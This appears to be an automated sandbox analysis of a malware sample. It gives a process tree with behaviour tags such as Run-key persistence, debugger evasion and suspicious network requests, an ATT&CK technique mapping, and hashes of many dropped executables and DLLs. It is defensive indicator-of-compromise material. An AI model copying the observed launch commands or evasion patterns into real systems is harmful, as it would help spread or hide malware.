C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4252 -ip 42521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2564 -ip 25641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2BC4248A980EBAC18414032B73545D27 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D850BF6609CC99DCE029784610A10D7C C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DED82F831DB51B30022D8650FD0D369F C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 21462F29F1B78E02BD0338B797BCCD5F2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 55B7A2085A1C50C8FC036DA6ACDA0A31 C2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default3⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--PH33"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffb5c4e9ec0,0x7ffb5c4e9ed0,0x7ffb5c4e9ee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:25⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=1860 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=2316 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2484 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2068 /prefetch:25⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=3128 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=3172 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=1892 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=2572 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=476 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_AF95.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4468 -ip 44681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\6850.exeC:\Users\Admin\AppData\Local\Temp\6850.exe1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6312 -ip 63121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Users\Admin\AppData\Local\Temp\82ED.exeC:\Users\Admin\AppData\Local\Temp\82ED.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\930B.exeC:\Users\Admin\AppData\Local\Temp\930B.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\9D1E.exeC:\Users\Admin\AppData\Local\Temp\9D1E.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 3002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6212 -ip 62121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 8762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6760 -ip 67601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 5392 -ip 53921⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1996 -ip 19961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6112 -ip 61121⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1BITS Jobs
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
c051ca801c70d8def2f4ff9ae4472b73
SHA177a866338645536eebb6abd0d86c0527d9023918
SHA256189ce7b9823f45f199817df5bf388313ae7571a3c67b05349c9b8f2a1d9d2cdc
SHA51295e84afad55f6149a22eb5db072d57eafa6d292345928e617b61aa6bd03a7e80c888f6f1d65c38277a6643d7a0a90d42d97d88b468bf50059a7850e7872bf4b1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
21dbb9d77fb6a43bb7e6d97411744d25
SHA1e288a77e999d6caa2c73bd2e19ad452469ecd905
SHA256750f597537146d06ca4767507a86a278d6539492a7849598773a0552224ccaf9
SHA51259a89a4dd343683be3d3213a71127e53dcf6840484b9d8676712f25babb5c24fedb9fa85c96e54e03b57a47e1ba89e83dd066927b3e45c0d55c1ba37625c59d0
-
C:\Users\Admin\AppData\Local\Temp\11111.exeMD5
cc0d6b6813f92dbf5be3ecacf44d662a
SHA1b968c57a14ddada4128356f6e39fb66c6d864d3f
SHA2560c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498
SHA5124d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5
-
C:\Users\Admin\AppData\Local\Temp\f6cb5833-4ee2-4cc4-8f64-7d953c774a86\@Cryptex777.dllMD5
e8641f344213ca05d8b5264b5f4e2dee
SHA196729e31f9b805800b2248fd22a4b53e226c8309
SHA25685e82b9e9200e798e8f434459eacee03ed9818cc6c9a513fe083e72d48884e24
SHA5123130f32c100ecb97083ad8ac4c67863e9ceed3a9b06fc464d1aeeaec389f74c8bf56f4ce04f6450fd2cc0fa861d085101c433cfa4bec3095f8ebeeb53b739109
-
C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\System.dllMD5
2e025e2cee2953cce0160c3cd2e1a64e
SHA1dec3da040ea72d63528240598bf14f344efb2a76
SHA256d821a62802900b068dcf61ddc9fdff2f7ada04b706815ab6e5038b21543da8a5
SHA5123cafce382b605a68e5a3f35f95b32761685112c5a9da9f87b0a06ec13da4155145bd06ffb63131bf87c3dc8bd61cb085884c5e78c832386d70397e3974854860
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnkMD5
3bb3ad794c894aa13d737abbad66c519
SHA124d695fcfdcbf5003eb21fc2ed80d4053bfaaccf
SHA256aadc707290a8e5a85571b5e176628f8d4f7c076a203b0ee2337963b599faf3f0
SHA512b80d359613892f4266076a199294e8fbaee5c20bce0431159167fcf389816d29e8f716cff89397fbeeb1415b728c578bbf257d61946317efda23d6f31ab6b950
-
C:\Users\Admin\Desktop\Lightening Media Player.lnkMD5
86031c089497b6e6dcebae01fc808f44
SHA1684824f512b839e321939cd42ec4b404f6f63426
SHA2560fb336fe0060fc3d8a9da72dbf5ff7fd1f545d7ca9aad6fd1364963149637d04
SHA512f05c7d0af038a772b728de39d2644f176ca9a5af2efc94c711cd25c60d3a710e4a0d857b7858de792b4d68cac44ed251e8826e9007dad64ae0f17281bb1479e6
-
C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exeMD5
11d57daf30ca3e02d82760025034d970
SHA118dbef336c70b6fbe50926602b3305299c258848
SHA256d303cc49119b3f27b904cc0dc168bb1c8cf45c88695dfbc850a595859625ac01
SHA51221c4ecea87144010ae2421214fb8291c7bcfa4776b44e3ae8dff9facf38bb0c29bd4bbd2cc4231d9827b0b85b57cf78656e6436befebf75769596737f4538f2b
-
C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exeMD5
11d57daf30ca3e02d82760025034d970
SHA118dbef336c70b6fbe50926602b3305299c258848
SHA256d303cc49119b3f27b904cc0dc168bb1c8cf45c88695dfbc850a595859625ac01
SHA51221c4ecea87144010ae2421214fb8291c7bcfa4776b44e3ae8dff9facf38bb0c29bd4bbd2cc4231d9827b0b85b57cf78656e6436befebf75769596737f4538f2b
-
C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exeMD5
11d57daf30ca3e02d82760025034d970
SHA118dbef336c70b6fbe50926602b3305299c258848
SHA256d303cc49119b3f27b904cc0dc168bb1c8cf45c88695dfbc850a595859625ac01
SHA51221c4ecea87144010ae2421214fb8291c7bcfa4776b44e3ae8dff9facf38bb0c29bd4bbd2cc4231d9827b0b85b57cf78656e6436befebf75769596737f4538f2b
-
C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exeMD5
11d57daf30ca3e02d82760025034d970
SHA118dbef336c70b6fbe50926602b3305299c258848
SHA256d303cc49119b3f27b904cc0dc168bb1c8cf45c88695dfbc850a595859625ac01
SHA51221c4ecea87144010ae2421214fb8291c7bcfa4776b44e3ae8dff9facf38bb0c29bd4bbd2cc4231d9827b0b85b57cf78656e6436befebf75769596737f4538f2b
-
C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exeMD5
11d57daf30ca3e02d82760025034d970
SHA118dbef336c70b6fbe50926602b3305299c258848
SHA256d303cc49119b3f27b904cc0dc168bb1c8cf45c88695dfbc850a595859625ac01
SHA51221c4ecea87144010ae2421214fb8291c7bcfa4776b44e3ae8dff9facf38bb0c29bd4bbd2cc4231d9827b0b85b57cf78656e6436befebf75769596737f4538f2b
-
C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exeMD5
11d57daf30ca3e02d82760025034d970
SHA118dbef336c70b6fbe50926602b3305299c258848
SHA256d303cc49119b3f27b904cc0dc168bb1c8cf45c88695dfbc850a595859625ac01
SHA51221c4ecea87144010ae2421214fb8291c7bcfa4776b44e3ae8dff9facf38bb0c29bd4bbd2cc4231d9827b0b85b57cf78656e6436befebf75769596737f4538f2b
-
C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exeMD5
9bf2480895b33565d02f30d1a07a20ba
SHA17624a0067c63e6b228a0255c41fa156174a5ac68
SHA2566be3a52cd5c077794a03f0596d1cbf3aee2635d268b03b476f6a2eaeb87d411c
SHA512bd0c28449e78dfcea7f05a2968ef11564f39d5fa3d5d081b32042c838ecda6a9fc6d6cbcc85fd984218203c253b6852ba6b46c96e60e2e1b584d66fb7b779ad5
-
C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exeMD5
9bf2480895b33565d02f30d1a07a20ba
SHA17624a0067c63e6b228a0255c41fa156174a5ac68
SHA2566be3a52cd5c077794a03f0596d1cbf3aee2635d268b03b476f6a2eaeb87d411c
SHA512bd0c28449e78dfcea7f05a2968ef11564f39d5fa3d5d081b32042c838ecda6a9fc6d6cbcc85fd984218203c253b6852ba6b46c96e60e2e1b584d66fb7b779ad5
-
C:\Users\Admin\Documents\5vMgVG9zA4l9mWyov7brGSyH.exeMD5
c5cdf4c9d78205655a2592a499b92e8f
SHA153d9dc7d0394eafd61c8498a01d9d7abd4f3761c
SHA2565ec0c20ecf87a05f81cbf45da37943f2f2ebfead783364ff89dd843a2fcde08b
SHA512980c7bdd901850c87d8848638f648dea06b6fe27d152de6b1204b4634c0f91706111f8ce123288a7cf36a7ef45693652d6566b9aa069de1193e01db7f8b34819
-
C:\Users\Admin\Documents\5vMgVG9zA4l9mWyov7brGSyH.exeMD5
c5cdf4c9d78205655a2592a499b92e8f
SHA153d9dc7d0394eafd61c8498a01d9d7abd4f3761c
SHA2565ec0c20ecf87a05f81cbf45da37943f2f2ebfead783364ff89dd843a2fcde08b
SHA512980c7bdd901850c87d8848638f648dea06b6fe27d152de6b1204b4634c0f91706111f8ce123288a7cf36a7ef45693652d6566b9aa069de1193e01db7f8b34819
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exeMD5
1cd51768a37e5d5027575a38a42eb13c
SHA1051f84f1062956fc3798456ae475939197d49d43
SHA2561df977d957e8ae492b1e90d63a0b18b24b7d78fff324a5aa144a01dc4202fe2f
SHA5129edd5ad91b0840f8603e3d3e0ca61e01a07a441328d4e2126f6d9bdd7b1ad4812b9c4dd5fccdaa943878160bcc05af0fd8aacafce1746f8e2da29d976b203d5d
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exeMD5
1cd51768a37e5d5027575a38a42eb13c
SHA1051f84f1062956fc3798456ae475939197d49d43
SHA2561df977d957e8ae492b1e90d63a0b18b24b7d78fff324a5aa144a01dc4202fe2f
SHA5129edd5ad91b0840f8603e3d3e0ca61e01a07a441328d4e2126f6d9bdd7b1ad4812b9c4dd5fccdaa943878160bcc05af0fd8aacafce1746f8e2da29d976b203d5d
-
C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exeMD5
fa2170ab2dfa330d961cccf8e93c757b
SHA1d3fd7ae0be7954a547169e29a44d467f14dfb340
SHA25678f4272d2904fd5539aa41955c99968e0971e167a5d9b42389e9a51ab79cf1b0
SHA5123880238681560639c153492eaf4a06fc738fed56e6cf3fb64ccd15f47046d04dccae17ff541a5eb32724b7af2a231169dc7c879eea54d2781fbc7429c1bedd4e
-
C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exeMD5
fa2170ab2dfa330d961cccf8e93c757b
SHA1d3fd7ae0be7954a547169e29a44d467f14dfb340
SHA25678f4272d2904fd5539aa41955c99968e0971e167a5d9b42389e9a51ab79cf1b0
SHA5123880238681560639c153492eaf4a06fc738fed56e6cf3fb64ccd15f47046d04dccae17ff541a5eb32724b7af2a231169dc7c879eea54d2781fbc7429c1bedd4e
-
C:\Users\Admin\Documents\B_v7FbFMaCVtguWH_z__hkT1.exeMD5
54ce8822fbf1cdb94c28d12ccd82f8f9
SHA17077757f069fe0ebd338aeff700cab323e3ab235
SHA2560984c3c6a8ab0a4e8f4564ebcd54ab74ae2d22230afafe48b346485251f522e2
SHA512183115142a2ae68259392fc03783f49df9312acdc49011ca367acaa82d68c209d25d50a0a917504572cc3b7467d7ce4ea6bf391fe6462d1f09ae743e8c0ea435
-
C:\Users\Admin\Documents\B_v7FbFMaCVtguWH_z__hkT1.exeMD5
54ce8822fbf1cdb94c28d12ccd82f8f9
SHA17077757f069fe0ebd338aeff700cab323e3ab235
SHA2560984c3c6a8ab0a4e8f4564ebcd54ab74ae2d22230afafe48b346485251f522e2
SHA512183115142a2ae68259392fc03783f49df9312acdc49011ca367acaa82d68c209d25d50a0a917504572cc3b7467d7ce4ea6bf391fe6462d1f09ae743e8c0ea435
-
C:\Users\Admin\Documents\EsxhG3_gIGbvwAFN8myBZi8b.exeMD5
2cc6d4f1c214e4d44d078773dc5469d0
SHA16dc7a3ebc447aa9b4edb14b670452336c110e646
SHA256dfe17befba0a9abd5a9f8db647be53e6a8dbfc8e2ba9b217088714a5eff7ed70
SHA512d825c537075e2d9149647d2782c98a197dd6cec1319d2ce0101004781344c6299dd0f1010f37fb51cc2694c0066d01c02bd1261f503dda18ceef0b9eb6f5453f
-
C:\Users\Admin\Documents\EsxhG3_gIGbvwAFN8myBZi8b.exeMD5
2cc6d4f1c214e4d44d078773dc5469d0
SHA16dc7a3ebc447aa9b4edb14b670452336c110e646
SHA256dfe17befba0a9abd5a9f8db647be53e6a8dbfc8e2ba9b217088714a5eff7ed70
SHA512d825c537075e2d9149647d2782c98a197dd6cec1319d2ce0101004781344c6299dd0f1010f37fb51cc2694c0066d01c02bd1261f503dda18ceef0b9eb6f5453f
-
C:\Users\Admin\Documents\Jc4yVtEOotyL__khOXuqTI3o.exeMD5
e399c741e5809f64dabd7ee219063081
SHA1411bdea66e7ca6616a13ffcda4c8388472ec4616
SHA256b9a12e40fe14966bea176d4eb5c96ca19b80982eeb08636711b53bf4fdecfdf1
SHA5126c99de695f0a98eb49aa866709a945c063a27a8f4c2cdbf9d0c457cfc6074de659779dc187e60a3a3cf50ef5493394a351a49e54f2900428d0937ee68ad1a495
-
